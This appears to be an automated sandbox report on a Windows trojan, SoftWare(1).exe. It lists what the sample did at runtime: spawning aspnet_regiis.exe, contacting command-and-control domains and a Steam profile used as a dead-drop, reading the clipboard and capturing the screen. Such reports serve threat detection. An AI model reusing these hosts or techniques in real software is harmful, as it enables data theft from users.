Source: aspnet_regiis.exe, 00000002.00000003.1696132514.0000000002953000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696271584.0000000002955000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696321945.0000000002975000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mathcucom.sbs/api2
Source: aspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mathcucom.sbs/apiPy
Source: aspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mathcucom.sbs/apiq#V
Source: aspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mathcucom.sbs/g
Source: aspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mathcucom.sbs/y#W
Source: aspnet_regiis.exe, 00000002.00000003.1695896940.000000000293E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696132514.0000000002947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://passimovrt.cfd/
Source: aspnet_regiis.exe, 00000002.00000002.1972630357.000000000292C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://passimovrt.cfd/api
Source: aspnet_regiis.exe, 00000002.00000003.1715514677.0000000002955000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://resinedyw.sbs/
Source: aspnet_regiis.exe, 00000002.00000003.1715514677.0000000002955000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://resinedyw.sbs/api
Source: aspnet_regiis.exe, 00000002.00000003.1715514677.0000000002955000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://resinedyw.sbs/apiq#V
Source: aspnet_regiis.exe, 00000002.00000003.1715514677.0000000002955000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://resinedyw.sbs:443/api
Source: aspnet_regiis.exe, 00000002.00000002.1972630357.0000000002918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: aspnet_regiis.exe, 00000002.00000003.1715514677.0000000002955000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vennurviot.sbs/
Source: aspnet_regiis.exe, 00000002.00000003.1715514677.0000000002955000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vennurviot.sbs/&
Source: aspnet_regiis.exe, 00000002.00000003.1715514677.0000000002955000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vennurviot.sbs/api
Source: aspnet_regiis.exe, 00000002.00000003.1780094391.00000000029B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780094391.00000000029B8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780094391.00000000029B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-man2
Source: aspnet_regiis.exe, 00000002.00000003.1780094391.00000000029B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 104.21.28.222:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.152.13:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.205.156:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.46.170:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.221:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.141.136:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49740 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_00584BE0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_00584BE0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_00584BE0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_00584BE0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_00584D70 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

2_2_00584D70

System Summary

PE file contains section with special chars

Source: SoftWare(1).exe

Static PE information: section name: 'H{_AE

PE file has nameless sections

Source: SoftWare(1).exe

Static PE information: section name:

Source: C:\Users\user\Desktop\SoftWare(1).exe

Code function: 0_2_6CF4BEA0 GetModuleHandleW,NtQueryInformationProcess,

0_2_6CF4BEA0

Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF4C4F0	0_2_6CF4C4F0
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF4A540	0_2_6CF4A540
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF4BEA0	0_2_6CF4BEA0
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF550D0	0_2_6CF550D0
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF5C4B0	0_2_6CF5C4B0
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF464A0	0_2_6CF464A0
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF56490	0_2_6CF56490
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF59880	0_2_6CF59880
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF58C60	0_2_6CF58C60
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF5E440	0_2_6CF5E440
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF56040	0_2_6CF56040
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF5AC30	0_2_6CF5AC30
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF59000	0_2_6CF59000
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF54DC0	0_2_6CF54DC0
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF6B997	0_2_6CF6B997
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF58930	0_2_6CF58930
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF5C110	0_2_6CF5C110
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF592F0	0_2_6CF592F0
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF452C0	0_2_6CF452C0
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF542C0	0_2_6CF542C0
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF57EB0	0_2_6CF57EB0
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF59E90	0_2_6CF59E90
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF55E30	0_2_6CF55E30
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF5AFD0	0_2_6CF5AFD0
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF58390	0_2_6CF58390
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF5EB60	0_2_6CF5EB60
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF56F40	0_2_6CF56F40
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF5D330	0_2_6CF5D330
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF5B710	0_2_6CF5B710
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: 0_2_6CF57B00	0_2_6CF57B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0058A429	2_2_0058A429
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0059162C	2_2_0059162C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00560B70	2_2_00560B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0055ECA0	2_2_0055ECA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0058AD60	2_2_0058AD60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0055CE80	2_2_0055CE80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00561048	2_2_00561048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00551000	2_2_00551000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0057E030	2_2_0057E030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0055B0F0	2_2_0055B0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00593090	2_2_00593090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_005881CE	2_2_005881CE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_005921C0	2_2_005921C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_005512D5	2_2_005512D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00594340	2_2_00594340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00571360	2_2_00571360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0056E323	2_2_0056E323
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0055132D	2_2_0055132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00579467	2_2_00579467
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00593430	2_2_00593430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_005764CB	2_2_005764CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00572480	2_2_00572480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0057B525	2_2_0057B525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00594600	2_2_00594600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0057560E	2_2_0057560E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_005776D0	2_2_005776D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_005926E0	2_2_005926E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0057A68D	2_2_0057A68D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0057F776	2_2_0057F776
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00580728	2_2_00580728
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0057E850	2_2_0057E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00589820	2_2_00589820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0057C8D7	2_2_0057C8D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_005598DE	2_2_005598DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_005538E0	2_2_005538E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0055C950	2_2_0055C950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0058E900	2_2_0058E900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00594900	2_2_00594900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_005739D0	2_2_005739D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_005579E0	2_2_005579E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0058A9E0	2_2_0058A9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0057BB50	2_2_0057BB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0057AB6E	2_2_0057AB6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00588B67	2_2_00588B67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00592B80	2_2_00592B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00582C70	2_2_00582C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0055AC60	2_2_0055AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00594C10	2_2_00594C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0055BC00	2_2_0055BC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00577CE3	2_2_00577CE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0056DC9E	2_2_0056DC9E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00559C8C	2_2_00559C8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00571D70	2_2_00571D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0057CD60	2_2_0057CD60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00576D28	2_2_00576D28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00558DC0	2_2_00558DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00579DA0	2_2_00579DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0056EEE0	2_2_0056EEE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00582E80	2_2_00582E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00580E87	2_2_00580E87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00592EA0	2_2_00592EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00564F0C	2_2_00564F0C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00576F20	2_2_00576F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00580FD0	2_2_00580FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00556FC0	2_2_00556FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00559FC0	2_2_00559FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0057AFE3	2_2_0057AFE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00592F90	2_2_00592F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00554FA0	2_2_00554FA0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 0055DF80 appears 217 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 0055C740 appears 62 times
Source: C:\Users\user\Desktop\SoftWare(1).exe	Code function: String function: 6CF5F800 appears 33 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 280 -s 1724

Source: SoftWare(1).exe, 00000000.00000002.1682123078.00000000013BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SoftWare(1).exe
Source: SoftWare(1).exe	Binary or memory string: OriginalFilenameVioletTrumpAmerica176Zachary.uPIH vs SoftWare(1).exe

Source: SoftWare(1).exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SoftWare(1).exe

Static PE information: Section: 'H{_AE ZLIB complexity 1.0003328476688103

Source: classification engine

Classification label: mal100.troj.evad.winEXE@5/7@11/9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_0058A260 CoCreateInstance,

2_2_0058A260

Source: C:\Users\user\Desktop\SoftWare(1).exe

File created: C:\Users\user\AppData\Roaming\msvcp110.dll

Jump to behavior

Source: C:\Users\user\Desktop\SoftWare(1).exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess280
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:120:WilError_03

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\c2971479-67ca-4e2c-9d71-3fc063496a05

Jump to behavior

Source: SoftWare(1).exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\SoftWare(1).exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SoftWare(1).exe	ReversingLabs: Detection: 21%
Source: SoftWare(1).exe	Virustotal: Detection: 32%

Source: unknown	Process created: C:\Users\user\Desktop\SoftWare(1).exe "C:\Users\user\Desktop\SoftWare(1).exe"
Source: C:\Users\user\Desktop\SoftWare(1).exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SoftWare(1).exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 280 -s 1724
Source: C:\Users\user\Desktop\SoftWare(1).exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SoftWare(1).exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: sspicli.dll	Jump to behavior
